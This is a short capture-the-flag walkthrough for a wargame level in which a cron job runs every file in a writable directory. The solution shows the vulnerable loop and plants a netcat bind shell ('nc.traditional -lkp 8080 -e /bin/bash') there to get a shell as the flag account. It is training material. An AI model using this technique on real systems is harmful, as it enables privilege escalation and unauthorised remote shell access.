About - Vulnerable Cron Job

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03. There is no source code available for this level.

Solution

Looking at the code,

for i in /home/flag03/writable.d/*; do
	(ulimit -t 5; bash -x $i)
	rm -f "$i"
done

note that there is no validation of files beyond checking that a file exists. Create a static nc listener to provide a shell. In this system, use

/bin/bash
nc.traditional -lkp 8080 -e "/bin/bash"

in a file. Use chmod +x <file name> to make the file executable, and then copy it to /home/flag03/writable.d/. Connect to the shell with nc 127.0.0.1 8080 after a few minutes.